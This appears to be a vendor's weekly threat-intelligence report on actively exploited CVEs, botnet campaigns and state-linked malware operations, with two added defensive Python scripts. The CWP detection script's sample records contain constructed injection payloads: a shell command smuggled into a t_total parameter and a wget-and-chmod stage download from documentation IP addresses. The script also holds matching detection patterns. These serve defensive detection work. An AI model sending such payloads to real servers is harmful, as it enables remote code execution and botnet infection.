This Week in Cybersecurity: Exploits and Espionage Converge Across Global Networks

November 7, 2025
Executive Summary

This week’s cybersecurity landscape reflected a surge in active exploitation and state-sponsored operations across multiple sectors. CISA added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, one impacting Gladinet CentreStack and Triofox and another affecting Control Web Panel (CWP), highlighting the continued risk from unpatched systems. Widespread exploitation was also observed in Microsoft Windows, the JobMonster WordPress theme, and the Post SMTP WordPress plugin.

Botnet operators such as EnemyBot, Sysrv-K, Andoryu, and AndroxGh0st expanded campaigns targeting exposed GitLab services, cloud gateways, and PHP-based applications, while IoT botnets such as Mirai, Bashlite, Tsunami, and BrickerBot focused on compromising Eir D1000 routers for persistence and lateral movement.

On the malware front, Arctic Wolf reported the China-linked UNC6384 (Mustang Panda) exploiting a Microsoft Windows vulnerability to deploy the PlugX RAT, and Sophos confirmed the Tick cyber espionage group's abuse of a Motex Lanscope Endpoint Manager flaw to infiltrate Japanese networks.

Key points

  • 2 new vulnerabilities were added to the CISA Known Exploited Vulnerabilities (KEV) catalog, reflecting recent exploitation activity.  
  • 3 additional vulnerabilities were confirmed as actively exploited in the wild during the week.  
  • Cytellite sensor telemetry detected exploit and botnet-driven scanning activity targeting globally exposed assets.  
  • 2 vulnerabilities were identified as being exploited by active malware campaigns, indicating weaponization by threat actors.  
  • Multiple PRE-NVD vulnerabilities were observed, suggesting potential exploitation prior to public disclosure.

What are the top trending or critical vulnerabilities observed this week?

Several high-impact vulnerabilities are currently trending across the cybersecurity community, demanding immediate attention and patch prioritization. Monitoring these emerging and widely discussed threats provides valuable insights, enabling organizations to make informed security decisions and strengthen their overall defense posture.

CVE-2025-5397 - Authentication Bypass Vulnerability in JobMonster WordPress theme
An Authentication Bypass Vulnerability in the JobMonster - Job Board WordPress Theme, affecting versions up to and including 4.8.1, allowed unauthenticated attackers to bypass standard authentication and gain administrative access. According to Wordfence, the flaw originated from a weakness in the theme's custom login functionality, specifically when social login features were enabled, where the check_login() function failed to properly verify user identity before granting access. This vulnerability, impacting over 5.6k customers, was already under active exploitation, with more than 1,640 attack attempts blocked within a 24-hour period. Successful exploitation allowed threat actors to obtain administrative privileges, alter site content, steal employer and candidate data, deploy backdoors, and use compromised servers for further malicious activity. The issue has been patched in JobMonster version 4.8.2, and users are urged to update immediately to mitigate the risk.

CVE-2025-9491 - Remote Code Execution Vulnerability in Microsoft Windows
A Remote Code Execution vulnerability in Microsoft Windows LNK File UI Misrepresentation allows remote attackers to execute arbitrary code via crafted .LNK files. The flaw, disclosed by Trend Micro’s Zero Day Initiative, arises from improper handling of .LNK files, enabling malicious content to be disguised and executed upon user interaction. UNC6384, a China-linked threat actor associated with Mustang Panda, exploited this flaw using decoy PDFs and a three-stage DLL side-loading chain to deploy PlugX malware entirely in memory. The group also used invisible HTA files loading external JavaScript from CloudFront to retrieve payloads, demonstrating a stealthy multi-stage attack chain. Despite active exploitation and the availability of a public proof-of-concept, Microsoft has not released a patch, stating that it does not consider this issue a vulnerability.

CVE-2025-11371 - Files or Directories Accessible to External Parties Vulnerability in Gladinet CentreStack and Triofox
A Files or Directories Accessible to External Parties vulnerability in Gladinet CentreStack and Triofox allowed attackers to disclose arbitrary system files on default installations up to and including version 16.7.10368.56560. Huntress reported active exploitation on September 26 - 27, 2025, where threat actors read Web.config to extract the machineKey and chained that disclosure with a prior ViewState deserialization flaw (CVE-2025-30406) to achieve remote code execution. Post-exploitation activity included base64-encoded payloads running as child processes of web servers, and three customer environments were confirmed compromised. No official patch was available at the time of reporting; Huntress recommended immediately disabling the “temp” handler in the UploadDownloadProxy Web.config at C:\Program Files (x86)\Gladinet Cloud Enterprise\UploadDownloadProxy\Web.config as a mitigation. A public proof-of-concept exists and the issue has been added to the CISA Known Exploited Vulnerabilities catalog.
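As an added check that is not part of Huntress's or Gladinet's guidance, the Python below verifies whether the "temp" handler named in the mitigation above is still registered in a Web.config, assuming it is an ordinary IIS handlers/add entry whose name or path contains "temp"; the config content is a constructed sample.

```python
"""Added mitigation check (not Gladinet's or Huntress's code) for the
CVE-2025-11371 workaround: confirm that the "temp" handler is no longer
registered in the UploadDownloadProxy Web.config. Assumption: the handler is
an IIS <system.webServer><handlers><add .../> entry whose name or path
contains "temp". The Web.config text below is a constructed sample."""
import xml.etree.ElementTree as ET

# Default location named in the report (Windows path).
DEFAULT_WEB_CONFIG = (r"C:\Program Files (x86)\Gladinet Cloud Enterprise"
                      r"\UploadDownloadProxy\Web.config")

# Constructed sample; handler names, paths and types are placeholders.
SAMPLE_UNMITIGATED = """<configuration>
  <system.webServer>
    <handlers>
      <add name="temp" path="temp/*" verb="*" type="Example.TempHandler" />
      <add name="upload" path="upload/*" verb="POST" type="Example.UploadHandler" />
    </handlers>
  </system.webServer>
</configuration>
"""

def temp_handlers(config_xml: str) -> list:
    """Names of registered handlers whose name or path mentions 'temp'."""
    root = ET.fromstring(config_xml)
    hits = []
    for add in root.iterfind("./system.webServer/handlers/add"):
        name, path = add.get("name", ""), add.get("path", "")
        if "temp" in name.lower() or "temp" in path.lower():
            hits.append(name)
    return hits

def mitigation_applied(config_xml: str) -> bool:
    """True when no 'temp' handler remains registered."""
    return not temp_handlers(config_xml)

def remove_temp_handlers(config_xml: str) -> str:
    """Return the config with matching <add> entries removed.
    Back up the original file before writing this result back."""
    root = ET.fromstring(config_xml)
    handlers = root.find("./system.webServer/handlers")
    if handlers is not None:
        for add in list(handlers.iterfind("add")):
            if "temp" in (add.get("name", "") + add.get("path", "")).lower():
                handlers.remove(add)
    return ET.tostring(root, encoding="unicode")

if __name__ == "__main__":
    print("temp handler present:", temp_handlers(SAMPLE_UNMITIGATED))
    print("mitigated after removal:", mitigation_applied(remove_temp_handlers(SAMPLE_UNMITIGATED)))
```

To check a live server, read DEFAULT_WEB_CONFIG into a string and pass it to mitigation_applied().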

CVE-2025-11833 - Missing Authorization Vulnerability in the Post SMTP WordPress Plugin
A Missing Authorization vulnerability in the Post SMTP WordPress plugin allowed unauthenticated attackers to read logged emails and perform account takeovers, impacting versions up to 3.6.0 before being patched in 3.6.1. Wordfence received the report from researcher “netranger” on October 11, 2025, verified it on October 15, and the vendor released a fix on October 29. The flaw stemmed from missing capability checks in the PostmanEmailLogs __construct routine, which exposed sensitive emails, including password reset links. Exploitation began on November 1, with Wordfence blocking over 4,500 attacks and warning that over 210,000 sites remained unpatched. The issue has since been resolved with the latest update, emphasizing the importance of timely patching.

CVE-2025-48703 - An OS Command Injection Vulnerability in the CWP Control Web Panel
An OS Command Injection vulnerability in the CentOS Web Panel (CWP) allowed unauthenticated remote code execution by injecting shell metacharacters into the t_total parameter of a filemanager&acc=changePerm request, affecting versions before 0.9.8.1205. Exploitation required knowledge or a guess of a valid non-root username and was triggered via a crafted HTTPS request that executed commands as the targeted local user, enabling web shells, persistence, lateral pivoting, or privilege escalation. Internet exposure was widespread: Netlas.io enumerated roughly 150,000 potentially affected CWP instances (37,510 in the United States) and Shodan showed over 220,000 internet-facing hosts, making opportunistic mass scanning highly likely; a public proof-of-concept was published. CWP released a fix in version 0.9.8.1205 in May 2025, the vulnerability was recently added to the CISA KEV catalog, and operators of CWP instances should immediately apply the update and hunt for indicators of compromise such as unexpected web shells and new user accounts.

What did Cytellite sensors detect this week?

Cytellite telemetry captured active exploit attempts and mass scanning campaigns against exposed services globally. The data highlights which vulnerabilities are under attack and provides source IPs and payloads to authorized teams for detailed threat analysis and validation.

Vulnerability | Product | Severity | Title | Exploited in the wild | CISA KEV
--- | --- | --- | --- | --- | ---
CVE-2025-7414 | Tenda O3V2 | High | OS command injection vulnerability in Tenda O3V2 1.0.0.12(3880) | True | False
CVE-2025-7417 | Tenda O3V2 | High | Stack-based Buffer Overflow vulnerability in Tenda O3V2 1.0.0.12(3880) | True | False
CVE-2025-61882 | Oracle E-Business Suite | Critical | Remote Code Execution Vulnerability in Oracle E-Business Suite | True | True
CVE-2025-5777 | Citrix NetScaler ADC and NetScaler Gateway | Critical | Out-of-Bounds Read Vulnerability in Citrix NetScaler ADC and NetScaler Gateway | True | True
CVE-2025-32432 | Craft CMS | Critical | Remote Code Execution vulnerability in craftcms cms from version 3.0.0-RC1 to before 3.9.15, 4.0.0-RC1 to before 4.14.15, and 5.0.0-RC1 to before 5.6.17 | True | False
CVE-2025-31324 | SAP NetWeaver | Critical | Unrestricted Upload of File with Dangerous Type vulnerability in SAP NetWeaver Visual Composer Metadata Uploader | True | True
CVE-2025-27636 | Apache Camel | Medium | Improper Handling of Case Sensitivity vulnerability in Apache Camel | True | True
CVE-2025-26399 | SolarWinds Web Help Desk | Critical | Deserialization Vulnerability in SolarWinds Web Help Desk | True | False
CVE-2025-25257 | Fortinet FortiWeb | Critical | Unauthenticated SQL Injection Vulnerability in Fortinet FortiWeb | True | True
CVE-2025-22457 | Ivanti Connect Secure and Ivanti Policy Secure | High | Stack-based Buffer Overflow vulnerability in Ivanti Connect Secure before version 22.7R2.6, Ivanti Policy Secure before version 22.7R1.4, and Ivanti ZTA Gateways before version 22.8R2.2 leads to remote code execution | True | True

What botnet activity was observed this week?

Multiple vulnerabilities were actively exploited by botnets, demonstrating automated infection and propagation across vulnerable systems. Analysis of MISP logs identified the top CVEs targeted by botnets, with payloads indicative of botnet activity, such as using wget commands with specific IP addresses, highlighting ongoing automated exploitation campaigns.

Vulnerability | Product | Title | Exploit | Abused by Botnet
--- | --- | --- | --- | ---
CVE-2022-22947 | Spring Cloud Gateway | Remote Code Execution Vulnerability in Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ | True | EnemyBot, Sysrv-K
CVE-2021-22205 | Gitlab-Exiftool | Remote Code Execution Vulnerability in Gitlab-Exiftool | True | Andoryu
CVE-2017-9841 | Util/PHP/eval-stdin.php in PHPUnit | Arbitrary PHP Code Execution Vulnerability in Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 | True | AndroxGh0st
CVE-2016-10372 | Eir D1000 modem | Improper Protocol Access Control Vulnerability in Eir D1000 modem | True | Bashlite, BrickerBot, Tsunami, Mirai
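As an added example that is not part of this report or of the Cytellite/MISP tooling, the detection logic below flags the two request patterns described in this section and in the CWP entry above: shell metacharacters in the t_total parameter of a filemanager acc=changePerm request (CVE-2025-48703), and botnet payloads that fetch a stage with wget from a bare IP address. The parameter strings, source addresses and the module=filemanager parameter name are constructed assumptions, and the HTTP method is not assumed.

```python
"""Added detection sketch (not Loginsoft's or CWP's code) for two patterns in
this report: the CVE-2025-48703 CWP command injection, where shell
metacharacters are placed in the t_total parameter of a filemanager
acc=changePerm request, and botnet payloads that fetch a stage with wget or
curl from a raw IP address. Request parameter strings below are constructed
samples, not real sensor telemetry; module=filemanager is an assumed name."""
import re
from urllib.parse import parse_qs, unquote_plus

SHELL_META = re.compile(r"[;&|`]|\$\(|\$\{")   # characters a shell would interpret
RAW_IP_FETCH = re.compile(
    r"\b(?:wget|curl)\b[^;|&]*?(?:\d{1,3}\.){3}\d{1,3}", re.IGNORECASE)

def is_cwp_changeperm_injection(params: str) -> bool:
    """params is the URL-encoded query string or form body of one request."""
    if "filemanager" not in params or "acc=changePerm" not in params:
        return False
    values = parse_qs(params, keep_blank_values=True).get("t_total", [])
    return any(SHELL_META.search(v) for v in values)

def has_raw_ip_fetch(params: str) -> bool:
    """True when the decoded payload runs wget/curl against a bare IPv4 address."""
    return RAW_IP_FETCH.search(unquote_plus(params)) is not None

def triage(records):
    """records: (source_ip, params) pairs -> list of (source_ip, finding)."""
    findings = []
    for src, params in records:
        if is_cwp_changeperm_injection(params):
            findings.append((src, "CVE-2025-48703: changePerm t_total injection attempt"))
        elif has_raw_ip_fetch(params):
            findings.append((src, "botnet-style stage download from raw IP"))
    return findings

# Constructed samples using RFC 5737 documentation addresses, not observed traffic.
SAMPLE_RECORDS = [
    ("203.0.113.10", "module=filemanager&acc=changePerm&fileName=a.txt"
                     "&t_total=755%3B+wget+http%3A%2F%2F198.51.100.7%2Fx+-O+%2Ftmp%2Fx"),
    ("203.0.113.11", "module=filemanager&acc=changePerm&fileName=index.html&t_total=644"),
    ("203.0.113.12", "cmd=wget+http%3A%2F%2F198.51.100.9%2Fbins%2Fmips%3Bchmod+777+mips"),
    ("203.0.113.13", "module=filemanager&acc=list&path=%2Fpublic_html"),
]

if __name__ == "__main__":
    for src, finding in triage(SAMPLE_RECORDS):
        print(f"{src}: {finding}")
```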

Which vulnerabilities were abused by malware this week?

Active malware campaigns exploited specific vulnerabilities to deliver payloads and carry out post-exploitation actions. Each targeted vulnerability is proactively monitored, manually analyzed, and mapped to MITRE ATT&CK tactics and techniques. Insights are derived from the LOVI vulnerability intelligence platform, which aggregates and curates data from multiple sources, OSINT groups, blogs, and data leak sites.  

CVE-2025-9491
According to Arctic Wolf, China-linked threat actor UNC6384 (associated with Mustang Panda, also tracked as Basin, Bronze President, Earth Preta, Red Delta, Temp.Hex, and Twill Typhoon) has been exploiting CVE-2025-9491 since September 2025 to deliver the PlugX remote access trojan through spear-phishing campaigns targeting European diplomatic personnel. The campaigns used malicious URLs to trigger infection chains affecting diplomats in Hungary, Belgium, Italy, the Netherlands, and Serbian government aviation departments. Earlier, the Zero Day Initiative (ZDI) had disclosed the Windows .LNK file vulnerability in March 2025, warning that 11 APT groups, including Evil Corp, APT43, Bitter, APT37, Mustang Panda, and others from North Korea, Russia, China, and Iran were already exploiting it across multiple critical sectors. HarfangLab also reported that XDSpy abused the same flaw to deploy the Go-based XDigo malware against Eastern European government entities, reinforcing that the vulnerability continues to attract sustained exploitation by state-sponsored actors.

CVE-2025-61932
According to Sophos, a cyber espionage group known as Tick (aka Bronze Butler, Daserf, REDBALDKNIGHT, Stalker Panda, Stalker Taurus, and Swirl Typhoon) exploited this vulnerability in Motex Lanscope Endpoint Manager to achieve remote SYSTEM-level command execution, with JPCERT/CC confirming active abuse to drop backdoors. Sophos observed attack chains delivering the Gokcpdoor backdoor in two variants (server and client) using DLL side-loading via an OAED Loader, and noted that the 2025 Gokcpdoor variant removed KCP support in favor of smux-based multiplexed C2 communications. Japan and the wider East Asia region represented the primary targets, aligned with Tick’s intelligence objectives, Sophos assessed, and defenders were urged to upgrade Lanscope servers and review internet-facing instances to mitigate further compromise.

Vulnerability | Severity | Title | Patch | Targeted By Malware | OSS
--- | --- | --- | --- | --- | ---
CVE-2025-9491 | High | Remote Code Execution Vulnerability in Microsoft Windows | No | UNC6384, PlugX malware, XDSpy, XDigo, Evil Corp, APT43, Bitter, APT37, Mustang Panda, SideWinder, RedHotel, Konni | False
CVE-2025-61932 | Critical | Improper Verification of Source of a Communication Channel Vulnerability in Motex LANSCOPE Endpoint Manager | Yes | Tick, Gokcpdoor | False

Were any PRE-NVD vulnerabilities identified this week?

PRE-NVD vulnerabilities refer to security flaws that are discovered, discussed, or even exploited in the wild before their official inclusion in the National Vulnerability Database (NVD). These early-stage vulnerabilities often emerge through threat actor chatter, exploit proof-of-concepts, and technical disclosures shared across social media platforms and underground forums, signaling potential exploitation risks before public awareness.

CVE-ID | Type of Vulnerability | Product | Reference
--- | --- | --- | ---
CVE-2025-10230 | Command injection | Samba server | Resource
CVE-2025-10966 | Missing SFTP host-key verification | cURL | Resource
CVE-2025-24293 | Remote Code Execution | Ruby on Rails Active Storage | Resource
CVE-2025-64323 | Missing Authorization | Kgateway | Resource

Conclusion

Overall, this week highlighted an increasing momentum in real-world exploitation, with threat actors rapidly expanding their attack surface coverage through a mix of mass-scanning, opportunistic targeting, and advanced privilege-escalation techniques. Platforms such as Loginsoft Vulnerability Intelligence (LOVI) empower organizations to stay proactive by providing timely insights into exploits, tracking attacker behaviors, and facilitating swift responses to emerging threats in an ever-evolving cybersecurity landscape.

FAQs:

1) What is CentOS Web Panel (CWP)?

A) CentOS Web Panel (CWP) is a free web hosting control panel used to manage servers running CentOS, Rocky Linux, and AlmaLinux. It provides an interface for managing web servers, databases, email, DNS, and security settings. A paid Pro version offers additional security features, automation, and support.

2) What is CVE-2025-2783?

A) CVE-2025-2783 is a sandbox escape vulnerability in the Mojo component of Google Chromium on Windows that arises from a logic error in which an incorrect handle is assigned under certain unspecified conditions. The flaw, described as an instance of an "incorrect handle provided in unspecified circumstances," could allow attackers to escape Chrome’s security sandbox, potentially leading to remote code execution.

3) What does “PoC available” mean, and why does it increase risk for a vulnerability?

A) “PoC available” means a working exploit for the vulnerability has been publicly released, proving it can be abused. This helps defenders test and validate fixes, but it also gives attackers a ready-made blueprint, often leading to rapid and widespread exploitation if systems remain unpatched.  

4) What does inclusion in the CISA KEV catalog indicate about a vulnerability’s risk level?  

A) When a vulnerability is added to the CISA KEV catalog, it signifies that it is being actively exploited in real-world attacks and poses a serious, immediate risk. CISA includes only confirmed exploited vulnerabilities in this list to ensure organizations focus on patching the most dangerous threats first. Being listed means the flaw demands urgent remediation to prevent compromise across government and enterprise environments.
